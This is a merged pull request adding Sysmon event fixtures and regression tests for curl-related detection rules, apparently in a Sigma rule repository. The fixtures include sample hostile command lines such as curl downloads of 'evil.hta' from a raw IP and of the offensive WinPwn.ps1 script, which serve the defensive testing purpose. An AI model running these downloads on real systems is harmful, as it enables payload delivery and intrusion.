Merge PR #5805 from @swachchhanda000 - Add regression tests for curl-related rules

update: Curl Web Request With Potential Custom User-Agent - add another curl supported flag for header
chore: add regression tests for curl-related rules

regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json

@@ -0,0 +1,66 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2025-12-11T06:22:12.568940Z"
+        }
+      },
+      "EventRecordID": 21497,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2025-12-11 06:22:12.498",
+      "ProcessGuid": "0197231E-6314-693A-D112-000000000800",
+      "ProcessId": 11000,
+      "Image": "C:\\Windows\\System32\\curl.exe",
+      "FileVersion": "8.10.1",
+      "Description": "The curl executable",
+      "Product": "The curl executable",
+      "Company": "curl, https://curl.se/",
+      "OriginalFileName": "curl.exe",
+      "CommandLine": "curl.exe  --cookie-jar cookie \"http://example.com\"",
+      "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
+      "LogonId": "0x3144c",
+      "TerminalSessionId": 1,
+      "IntegrityLevel": "High",
+      "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+      "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800",
+      "ParentProcessId": 3476,
+      "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+      "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml

@@ -0,0 +1,13 @@
+id: d7f159c3-db76-4e39-b677-c0958f5f82b8
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: 5a6e1e16-07de-48d8-8aae-faa766c05e88
+      title: Potential Cookies Session Hijacking
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 1
+      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx

regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json

@@ -0,0 +1,66 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2025-12-11T06:17:19.772545Z"
+        }
+      },
+      "EventRecordID": 21475,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2025-12-11 06:17:19.636",
+      "ProcessGuid": "0197231E-61EF-693A-C812-000000000800",
+      "ProcessId": 6400,
+      "Image": "C:\\Windows\\System32\\curl.exe",
+      "FileVersion": "8.10.1",
+      "Description": "The curl executable",
+      "Product": "The curl executable",
+      "Company": "curl, https://curl.se/",
+      "OriginalFileName": "curl.exe",
+      "CommandLine": "curl.exe  -H \"User-Agent: EvilAgent\" http://example.com",
+      "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
+      "LogonId": "0x3144c",
+      "TerminalSessionId": 1,
+      "IntegrityLevel": "High",
+      "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+      "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800",
+      "ParentProcessId": 3476,
+      "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+      "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml

@@ -0,0 +1,13 @@
+id: 6428e458-fe2e-4936-accb-aebd0bcc8e35
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: 85de1f22-d189-44e4-8239-dc276b45379b
+      title: Curl Web Request With Potential Custom User-Agent
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 1
+      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx

regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json

@@ -0,0 +1,66 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2025-12-11T07:02:39.732592Z"
+        }
+      },
+      "EventRecordID": 21767,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2025-12-11 07:02:39.718",
+      "ProcessGuid": "0197231E-6C8F-693A-2613-000000000800",
+      "ProcessId": 17752,
+      "Image": "C:\\Windows\\System32\\curl.exe",
+      "FileVersion": "8.10.1",
+      "Description": "The curl executable",
+      "Product": "The curl executable",
+      "Company": "curl, https://curl.se/",
+      "OriginalFileName": "curl.exe",
+      "CommandLine": "curl  --output hello.txt https://12.34.56.78/hack/evil.txt",
+      "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+      "LogonId": "0x317fb",
+      "TerminalSessionId": 1,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+      "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+      "ParentProcessId": 14736,
+      "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+      "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml

@@ -0,0 +1,13 @@
+id: 6aac357c-fe1d-4ca0-82e2-df626f71e838
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218
+      title: File Download From IP URL Via Curl.EXE
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 1
+      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx

regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json

@@ -0,0 +1,66 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2025-12-11T06:34:20.042883Z"
+        }
+      },
+      "EventRecordID": 21588,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2025-12-11 06:34:19.983",
+      "ProcessGuid": "0197231E-65EB-693A-F112-000000000800",
+      "ProcessId": 14440,
+      "Image": "C:\\Windows\\System32\\curl.exe",
+      "FileVersion": "8.10.1",
+      "Description": "The curl executable",
+      "Product": "The curl executable",
+      "Company": "curl, https://curl.se/",
+      "OriginalFileName": "curl.exe",
+      "CommandLine": "curl  --output benign.hta \"https://12.34.56.78/hack/evil.hta\"",
+      "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+      "LogonId": "0x317fb",
+      "TerminalSessionId": 1,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+      "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+      "ParentProcessId": 14736,
+      "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+      "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml

@@ -0,0 +1,13 @@
+id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043
+      title: Suspicious File Download From IP Via Curl.EXE
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 1
+      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx

regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json

@@ -0,0 +1,66 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2025-12-11T06:41:38.130858Z"
+        }
+      },
+      "EventRecordID": 21642,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2025-12-11 06:41:38.096",
+      "ProcessGuid": "0197231E-67A2-693A-FF12-000000000800",
+      "ProcessId": 9656,
+      "Image": "C:\\Windows\\System32\\curl.exe",
+      "FileVersion": "8.10.1",
+      "Description": "The curl executable",
+      "Product": "The curl executable",
+      "Company": "curl, https://curl.se/",
+      "OriginalFileName": "curl.exe",
+      "CommandLine": "curl  -O \"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\"",
+      "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+      "LogonId": "0x317fb",
+      "TerminalSessionId": 1,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+      "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+      "ParentProcessId": 14736,
+      "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+      "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml

@@ -0,0 +1,13 @@
+id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb
+      title: Suspicious File Download From File Sharing Domain Via Curl.EXE
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 1
+      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx

regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json

@@ -0,0 +1,66 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2025-12-11T06:43:20.070938Z"
+        }
+      },
+      "EventRecordID": 21651,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2025-12-11 06:43:20.052",
+      "ProcessGuid": "0197231E-6808-693A-0413-000000000800",
+      "ProcessId": 17792,
+      "Image": "C:\\Windows\\System32\\curl.exe",
+      "FileVersion": "8.10.1",
+      "Description": "The curl executable",
+      "Product": "The curl executable",
+      "Company": "curl, https://curl.se/",
+      "OriginalFileName": "curl.exe",
+      "CommandLine": "curl  --insecure http://example.com",
+      "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+      "LogonId": "0x317fb",
+      "TerminalSessionId": 1,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+      "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+      "ParentProcessId": 14736,
+      "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+      "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml

@@ -0,0 +1,13 @@
+id: ef93f624-2b41-41ee-9596-298d3158acfb
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec
+      title: Insecure Transfer Via Curl.EXE
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 1
+      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx

regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json

@@ -0,0 +1,66 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2025-12-11T06:45:56.284330Z"
+        }
+      },
+      "EventRecordID": 21680,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2025-12-11 06:45:56.239",
+      "ProcessGuid": "0197231E-68A4-693A-0713-000000000800",
+      "ProcessId": 13700,
+      "Image": "C:\\Windows\\System32\\curl.exe",
+      "FileVersion": "8.10.1",
+      "Description": "The curl executable",
+      "Product": "The curl executable",
+      "Company": "curl, https://curl.se/",
+      "OriginalFileName": "curl.exe",
+      "CommandLine": "curl  --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo",
+      "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+      "LogonId": "0x317fb",
+      "TerminalSessionId": 1,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+      "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+      "ParentProcessId": 14736,
+      "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+      "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml

@@ -0,0 +1,13 @@
+id: 11dd9a12-467e-4c13-b928-7c3aea60f59f
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77
+      title: Insecure Proxy/DOH Transfer Via Curl.EXE
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 1
+      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx

regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json

@@ -0,0 +1,66 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2025-12-11T06:51:23.281436Z"
+        }
+      },
+      "EventRecordID": 21706,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2025-12-11 06:51:23.255",
+      "ProcessGuid": "0197231E-69EB-693A-1313-000000000800",
+      "ProcessId": 13896,
+      "Image": "C:\\Windows\\System32\\curl.exe",
+      "FileVersion": "8.10.1",
+      "Description": "The curl executable",
+      "Product": "The curl executable",
+      "Company": "curl, https://curl.se/",
+      "OriginalFileName": "curl.exe",
+      "CommandLine": "curl  file:///C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll",
+      "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+      "LogonId": "0x317fb",
+      "TerminalSessionId": 1,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+      "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+      "ParentProcessId": 14736,
+      "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+      "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml

@@ -0,0 +1,13 @@
+id: 4dfcc9a3-f555-4692-aa17-bca049de2f61
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: aa6f6ea6-0676-40dd-b510-6e46f02d8867
+      title: Local File Read Using Curl.EXE
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 1
+      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx

rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml

@@ -22,3 +22,4 @@ detection:
 falsepositives:
     - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml

rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml

@@ -7,19 +7,26 @@ references:
     - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
 author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023-07-27
+modified: 2025-12-11
 tags:
     - attack.execution
 logsource:
     category: process_creation
     product: windows
 detection:
+    # Example: This command line would trigger the rule
+    # curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com
     selection_img:
         - Image|endswith: '\curl.exe'
         - OriginalFileName: 'curl.exe'
-    selection_header:
+    selection_header_flag_1:
         CommandLine|re: '\s-H\s' # Must be Regex as the flag needs to be case sensitive
+    selection_header_flag_2:
+        CommandLine|contains: '--header'
+    selection_user_agent:
         CommandLine|contains: 'User-Agent:'
-    condition: all of selection_*
+    condition: selection_img and 1 of selection_header_* and selection_user_agent
 falsepositives:
     - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml

rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml

@@ -78,3 +78,4 @@ detection:
 falsepositives:
     - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml

rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml

@@ -75,3 +75,4 @@ detection:
 falsepositives:
     - Unknown
 level: high
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml

rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml

@@ -94,3 +94,4 @@ detection:
 falsepositives:
     - Unknown
 level: high
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml

rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml

@@ -22,3 +22,4 @@ detection:
 falsepositives:
     - Access to badly maintained internal or development systems
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml

rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml

@@ -23,3 +23,4 @@ detection:
 falsepositives:
     - Access to badly maintained internal or development systems
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml

rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml

@@ -21,3 +21,4 @@ detection:
 falsepositives:
     - Unknown
 level: medium
+regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml